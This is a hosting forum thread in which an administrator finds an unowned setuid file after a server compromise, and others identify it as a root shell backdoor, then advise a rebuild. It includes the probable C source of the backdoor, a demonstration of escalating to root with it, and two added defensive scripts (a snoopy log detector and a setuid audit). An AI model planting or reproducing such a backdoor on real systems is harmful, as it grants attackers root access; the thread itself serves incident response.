  1. #1
    Join Date
    Sep 2011
    Posts
    40

    strange executable

    Recently, one of my servers was compromised through some security hole in a PHP script (note: the server is running suPHP). I cleaned up the server but did not reinstall it. However, there is this file on the server - /usr/bin/grscnfg - for which I couldn't find any reference on the internet. This file has its permissions set to -rwsr-xr-x, so basically any user can run it. Is this something to worry about or is this a normal file? The ctime stat on the file is around the time when the server was compromised. I uploaded this file to VirusTotal and it's clean...

    Any suggestions on what to do? Should I delete the file? Any advice would be greatly appreciated, thanks!
    Last edited by tonytz; 11-17-2013 at 07:20 PM.

  2. #2
    Join Date
    Nov 2013
    Posts
    103
    Code:
    yum whatprovides '/usr/bin/grscnfg'
    Also check what it is, a binary or a script with

    Code:
    file /usr/bin/grscnfg
    And by the way, the only way to be sure is to wipe and reinstall the server. There are plenty of malware scripts and binaries that aren't flagged by virus or malware checkers, including rootkits.

    If you don't want to nuke the server I guess the "best" you can do is bring it to a rescue mode (as long as it doesn't boot from the server's own hdd) and do a thorough scan with various tools.

  3. #3
    Join Date
    Sep 2011
    Posts
    40
    yum whatprovides shows that there are no matches. Similarly, it doesn't belong to any package according to rpm, so I just gzipped it and moved it to another folder. Not sure if this is useful to do at this stage - I reviewed the output of rpm -Va and nothing suspicious came up.

    I really don't want to re-install the server, but it looks like it will have to be done eventually. The attacker could potentially have gained root after the PHP script compromise, given that the server wasn't kept up to date with patches.

    Regardless, thanks very much for the tips.


  4. #4
    Join Date
    Apr 2011
    Location
    Melbourne
    Posts
    93
    You could try running the strings program over it to see if there are any hard-coded error messages, callbacks or HTTP endpoints. Just note this won't do much if the binary has any level of obfuscation or encryption.

    Code:
    strings /usr/bin/grscnfg

  5. #5
    Join Date
    Mar 2003
    Location
    California USA
    Posts
    13,681
    Would you be willing to send it to me?
    Steven Ciaburri | Industry's Best Server Management - Rack911.com
    Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
    Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
    FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance

  6. #6
    Join Date
    Sep 2011
    Posts
    40
    Quote Originally Posted by ketan View Post
    You could try running the strings program over it to see if there is any hard coded error messages, callbacks, HTTP endpoints. Just note this won't do much if the binary has any level of obfuscation or encryption.

    Code:
    strings /usr/bin/grscnfg
    Here is the entire strings output, though not sure what to make of it

    [root@server src]# strings grscnfg
    /lib64/ld-linux-x86-64.so.2
    fff.
    fffff.
    l$ L
    t$(L
    |$0H
    yjN:
    0zjN:
    __gmon_start__
    libc.so.6
    setuid
    system
    setgid
    __libc_start_main
    GLIBC_2.2.5
    /lib64/ld-linux-x86-64.so.2

  7. #7
    Join Date
    Sep 2011
    Posts
    40
    Quote Originally Posted by Steven View Post
    Would you be willing to send it to me?
    Sure, please let me know where you prefer the gzip of the file to be sent. Thanks

  8. #8
    Join Date
    Mar 2003
    Location
    California USA
    Posts
    13,681
    steve@rack911.com

    From your strings output it looks like a SUID shell which would mean you were root compromised.

    Send it to me and I will confirm.

  9. #9
    Join Date
    Apr 2011
    Location
    Melbourne
    Posts
    93
    Quote Originally Posted by tonytz View Post
    setuid
    system
    setgid
    Steven beat me to it, but those 3 system calls there would indicate it is a shell that runs as root.

    It's probably something as simple as

    Code:
    #include <stdlib.h>
    #include <unistd.h>

    int main(int argc, char *argv[])
    {
        /* the file is setuid root, so euid is already 0 at exec time;
           make the real uid/gid 0 as well so the child shell keeps root */
        setuid(0);
        setgid(0);

        /* run the first argument through /bin/sh -c, now as root */
        system(argv[1]);

        return 0;
    }
    If there is one, there could be more. Would definitely look into reinstalling from scratch.

  10. #10
    Join Date
    Mar 2003
    Location
    California USA
    Posts
    13,681
    For onlookers to this thread this is definitely a malicious file.

    As you can see I am logged in as user steven:

    steven@steven.com [~]# id
    uid=501(steven) gid=502(steven) groups=502(steven)
    steven@steven.com [~]#
    I can escalate to root.

    steven@steven.com [~]# grscnfg id
    uid=0(root) gid=0(root) groups=0(root),502(steven)
    steven@steven.com [~]#
    Nov 18 19:37:09 cpanel snoopy[7517]: [uid:501 sid:7471 tty:/dev/pts/0 cwd:/home/steven filename:/usr/bin/grscnfg]: grscnfg id
    Nov 18 19:37:09 cpanel snoopy[7518]: [uid:0 sid:7471 tty:/dev/pts/0 cwd:/home/steven filename:/usr/bin/id]: id
    Typical SUID shell.
    It starts off as user:

    7988 0000/0502 execve("/usr/bin/grscnfg", ["/usr/bin/grscnfg", "id"], [/* 25 vars */]) = 0
    Escalates to root (our patch won't catch the UID change in current form through a suid file, only group, but this gives you the idea.):

    7988 0000/0502 setgid(0) = 0
    7988 0000/0000 setuid(0) = 0
    Runs the argument as root.

    7989 0000/0000 execve("/bin/sh", ["sh", "-c", "id"], [/* 25 vars */]) = 0
    7989 0000/0000 execve("/usr/bin/id", ["id"], [/* 25 vars */]) = 0


    Definitely rooted.

    I would see if your openssh packages are compromised as well.
    Last edited by Steven; 11-18-2013 at 08:52 PM.
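    The snoopy lines above are the detection opportunity in this thread: within one session (same sid and tty) an exec at uid 501 is immediately followed by an exec at uid 0, and the thing that sat between them was not su or sudo. The script below is an added example, not code from the thread or from snoopy's authors; it parses snoopy's default record format as shown in the post and reports every such uid drop to root. The allowlist of expected escalators is an assumption to tune per host, and the sample log is constructed: the two lines quoted above plus a root cron exec and a legitimate `sudo id` in another session that must not alert.

```python
"""Flag uid-to-root transitions inside one login session from snoopy execve logs."""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional

# snoopy's "[uid:... sid:... tty:... cwd:... filename:...]: cmd" record, as seen in the post.
SNOOPY_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2}\s+\d{2}:\d{2}:\d{2})\s+(?P<host>\S+)\s+snoopy\[(?P<pid>\d+)\]:\s+"
    r"\[uid:(?P<uid>\d+)\s+sid:(?P<sid>\d+)\s+tty:(?P<tty>\S+)\s+cwd:(?P<cwd>\S+)\s+"
    r"filename:(?P<filename>\S+)\]:\s+(?P<cmd>.*)$"
)

# Binaries that are expected to change the uid inside a session. Assumed allowlist for
# this example; a real deployment tunes it per host (and alerts on new setuid files too).
EXPECTED_ESCALATORS = frozenset({"/usr/bin/sudo", "/bin/su", "/usr/bin/su"})


@dataclass
class Exec:
    ts: str
    pid: int
    uid: int
    sid: int
    tty: str
    filename: str
    cmd: str


def parse_snoopy(line: str) -> Optional[Exec]:
    """Parse one snoopy syslog line; return None for lines that are not snoopy records."""
    m = SNOOPY_RE.match(line.strip())
    if m is None:
        return None
    return Exec(m["ts"], int(m["pid"]), int(m["uid"]), int(m["sid"]),
                m["tty"], m["filename"], m["cmd"])


def find_uid_escalations(lines: Iterable[str],
                         allowlist=EXPECTED_ESCALATORS) -> List[Dict[str, object]]:
    """Return one finding per point where a session (sid) goes from a non-zero uid to uid 0
    and the exec that immediately preceded it in that session was not an allowlisted escalator."""
    last_exec: Dict[int, Exec] = {}   # sid -> most recent exec seen in that session
    findings: List[Dict[str, object]] = []
    for line in lines:
        ev = parse_snoopy(line)
        if ev is None:
            continue
        prev = last_exec.get(ev.sid)
        if ev.uid == 0 and prev is not None and prev.uid != 0 and prev.filename not in allowlist:
            findings.append({
                "ts": ev.ts, "sid": ev.sid, "tty": ev.tty, "from_uid": prev.uid,
                "via": prev.filename, "command": prev.cmd, "ran_as_root": ev.cmd,
            })
        last_exec[ev.sid] = ev
    return findings


# Constructed sample: the two lines quoted in the post above, plus an unrelated root cron
# exec and a legitimate `sudo id` in a second session, neither of which should alert.
SAMPLE_LOG = """\
Nov 18 19:36:01 cpanel snoopy[7401]: [uid:0 sid:7400 tty:(none) cwd:/ filename:/usr/sbin/logrotate]: logrotate /etc/logrotate.conf
Nov 18 19:37:09 cpanel snoopy[7517]: [uid:501 sid:7471 tty:/dev/pts/0 cwd:/home/steven filename:/usr/bin/grscnfg]: grscnfg id
Nov 18 19:37:09 cpanel snoopy[7518]: [uid:0 sid:7471 tty:/dev/pts/0 cwd:/home/steven filename:/usr/bin/id]: id
Nov 18 19:40:22 cpanel snoopy[7602]: [uid:502 sid:7590 tty:/dev/pts/1 cwd:/home/ops filename:/usr/bin/sudo]: sudo id
Nov 18 19:40:22 cpanel snoopy[7603]: [uid:0 sid:7590 tty:/dev/pts/1 cwd:/home/ops filename:/usr/bin/id]: id
"""

if __name__ == "__main__":
    for f in find_uid_escalations(SAMPLE_LOG.splitlines()):
        print(f"{f['ts']} sid={f['sid']} tty={f['tty']}: uid {f['from_uid']} -> 0 via "
              f"{f['via']} ({f['command']!r}), then ran {f['ran_as_root']!r} as root")
```

    Run against the constructed sample it reports exactly one finding, sid 7471 going from uid 501 to root via /usr/bin/grscnfg, and stays quiet for the sudo session and the root cron job. Feeding it `grep snoopy /var/log/secure` (or wherever syslog routes snoopy) would have surfaced this backdoor the first time the attacker used it.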

  11. #11
    Join Date
    Mar 2003
    Location
    California USA
    Posts
    13,681
    Quote Originally Posted by ketan View Post
    Steven beat me to it, but those 3 system calls there would indicate it is a shell that runs as root.

    It's probably something as simple as [...]

    If there is one, there could be more. Would definitely look into reinstalling from scratch.
    That is exactly the code most likely, its really common.

  12. #12
    Join Date
    Sep 2011
    Posts
    40
    Quote Originally Posted by ketan View Post
    Steven beat me to it, but those 3 system calls there would indicate it is a shell that runs as root.

    It's probably something as simple as [...]

    If there is one, there could be more. Would definitely look into reinstalling from scratch.
    Ok, this is bad...looks like a long work day ahead of me. Thanks for explaining this!

  13. #13
    Join Date
    Sep 2011
    Posts
    40
    Quote Originally Posted by Steven View Post
    For onlookers to this thread this is definitely a malicious file.

    [...]

    Definitely rooted.

    I would see if your openssh packages are compromised as well.
    Steve, thank you very much for looking into this. This pretty much confirms the worst that could possibly happen to my server. What do you propose the best course of action is now? Please see my email also.

  14. #14
    Join Date
    Mar 2003
    Location
    California USA
    Posts
    13,681
    Quote Originally Posted by tonytz View Post
    Steve, thank you very much for looking into this. This pretty much confirms the worst that could possibly happen to my server. What do you propose the best course of action is now? Please see my email also.
    OS reinstall
    Secure the server
    Restore clean backups (if you have them).

    There is also the possibility of these being inside accounts, so don't blindly rsync stuff over.

  15. #15
    Join Date
    Sep 2011
    Posts
    40
    Quote Originally Posted by Steven View Post
    OS reinstall
    Secure the server
    Restore clean backups (if you have them).

    There is also the possibility of these being inside accounts, so don't blindly rsync stuff over.
    Will do. Just ordered a new server and will set it up today.

    Thank you all to everyone who responded to this thread!

  16. #16
    Join Date
    Nov 2013
    Posts
    103
    Quote Originally Posted by Steven View Post
    Escalates to root
    How? Kernel vuln?

  17. #17
    Join Date
    Mar 2003
    Location
    California USA
    Posts
    13,681

    Quote Originally Posted by wndml View Post
    How? Kernel vuln?
    The binary has suid bit set.
    They got hacked some other way and this is a backdoor.

  18. #18
    Join Date
    Sep 2011
    Posts
    40
    Quote Originally Posted by Steven View Post
    I would see if your openssh packages are compromised aswell.
    Just checked (the package for /usr/libexec/openssh):
    rpm -V openssh-5.3p1-20.el6.x86_64

    The command returned no output. Based on this, is it safe to assume that openssh packages are not compromised?

  19. #19
    Join Date
    Apr 2011
    Location
    Melbourne
    Posts
    93
    RPM only produces output if there is a verification failure, so I would hazard a guess that your SSHd hasn't been compromised. Better to be safe than sorry though.
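    The checks suggested across this thread (find set-id files, ask `rpm -qf` who owns them, run `rpm -V` on the owning package and treat silence as "unmodified", then look at the ctime of anything unowned) are worth doing as one pass over the whole box rather than one file at a time. The script below is an added example written for this thread, not a tool the posters used: it walks the given roots, classifies every setuid/setgid regular file as OK, MODIFIED or UNOWNED, and sorts by ctime so files dropped around the time of the compromise cluster together. The package lookups are the real `rpm -qf` and `rpm -V` when rpm is present; the demo tree, the "passwd" package name and the stand-in database used in `__main__` are constructed for the example.

```python
"""Audit setuid/setgid files and check each one against the RPM database."""
import os
import shutil
import stat
import subprocess
import tempfile
from typing import Callable, Dict, Iterable, Iterator, List, Optional, Tuple

# Default roots: the package-managed trees plus the places a dropped backdoor tends to land.
DEFAULT_ROOTS = ["/usr", "/bin", "/sbin", "/lib", "/lib64", "/opt", "/var", "/tmp", "/home"]


def rpm_owner(path: str) -> Optional[str]:
    """Package owning `path` per `rpm -qf`, or None when no package claims it (or rpm is absent)."""
    if shutil.which("rpm") is None:
        return None
    r = subprocess.run(["rpm", "-qf", path], capture_output=True, text=True)
    return r.stdout.strip() if r.returncode == 0 else None


def rpm_verify(pkg: str) -> bool:
    """True when `rpm -V pkg` is silent: every file in the package still matches its recorded
    size, digest, mode and owner. Any output (or a non-zero exit) means something was altered."""
    r = subprocess.run(["rpm", "-V", pkg], capture_output=True, text=True)
    return r.returncode == 0 and r.stdout.strip() == ""


def find_setid_files(roots: Iterable[str]) -> Iterator[Tuple[str, os.stat_result]]:
    """Yield (path, stat) for regular files with the setuid or setgid bit under `roots`."""
    for root in roots:
        for dirpath, _dirs, names in os.walk(root):   # os.walk does not follow symlinked dirs
            for name in names:
                p = os.path.join(dirpath, name)
                try:
                    st = os.lstat(p)   # lstat: a symlink to a set-id file is not itself set-id
                except OSError:
                    continue
                if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                    yield p, st


def audit_setid(roots: Iterable[str],
                owner_of: Callable[[str], Optional[str]] = rpm_owner,
                verify: Callable[[str], bool] = rpm_verify) -> List[Dict[str, object]]:
    """Classify each set-id file: OK (owned, package verifies), MODIFIED (owned, rpm -V
    complains) or UNOWNED (no package claims it). Sorted by ctime, oldest first."""
    verified: Dict[str, bool] = {}   # cache: rpm -V is per package, not per file
    findings: List[Dict[str, object]] = []
    for path, st in find_setid_files(roots):
        pkg = owner_of(path)
        if pkg is None:
            status = "UNOWNED"
        else:
            if pkg not in verified:
                verified[pkg] = verify(pkg)
            status = "OK" if verified[pkg] else "MODIFIED"
        findings.append({"path": path, "mode": oct(stat.S_IMODE(st.st_mode)), "uid": st.st_uid,
                         "ctime": st.st_ctime, "package": pkg, "status": status})
    findings.sort(key=lambda f: f["ctime"])
    return findings


def build_demo_tree() -> Tuple[str, Dict[str, str]]:
    """Constructed fixture: a temp tree with one 'packaged' setuid binary, one unowned
    setuid file named like the one in this thread, and one plain executable."""
    base = tempfile.mkdtemp(prefix="setid-audit-")
    bindir = os.path.join(base, "usr", "bin")
    os.makedirs(bindir)
    files = {"owned": os.path.join(bindir, "passwd"),
             "backdoor": os.path.join(bindir, "grscnfg"),
             "plain": os.path.join(bindir, "ls")}
    for p in files.values():
        open(p, "w").close()
    os.chmod(files["owned"], 0o4755)
    os.chmod(files["backdoor"], 0o4755)
    os.chmod(files["plain"], 0o755)
    return base, files


if __name__ == "__main__":
    base, files = build_demo_tree()
    # Stand-in for the rpm database: only the 'passwd' binary is claimed by a (made-up) package.
    fake_db = {files["owned"]: "passwd"}
    for f in audit_setid([base], owner_of=fake_db.get, verify=lambda pkg: True):
        print(f"{f['status']:8} {f['mode']} uid={f['uid']} {f['path']}  ({f['package']})")
    # On a real CentOS/RHEL host: audit_setid(DEFAULT_ROOTS), which shells out to rpm -qf / rpm -V.
```

    Two caveats the thread already hints at. `rpm -V` trusts the RPM database on the same disk, so an attacker who got root can edit the database or replace rpm itself; that is why the only safe answer in the thread is a rebuild, and why running this from a rescue environment with the compromised disk mounted read-only is worth more than running it live. And a set-id file with no owning package is the strongest signal here, but a backdoor can just as well be a modified file inside a package (which is what the `rpm -V openssh-...` check in this thread is for).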

  20. #20
    Join Date
    Sep 2011
    Posts
    40
    Quote Originally Posted by ketan View Post
    RPM only produces output if there is a verification failure, so I would hazard a guess that your SSHd hasn't been compromised. Better to be safe then sorry though.
    ya, just to be on the safe side, I am preparing/setting up a new server right now but not disconnecting the old one yet until the new one is ready for a smooth transfer - hopefully by the end of next morning

  21. #21
    Join Date
    Mar 2003
    Location
    California USA
    Posts
    13,681
    That is a really old rpm package.
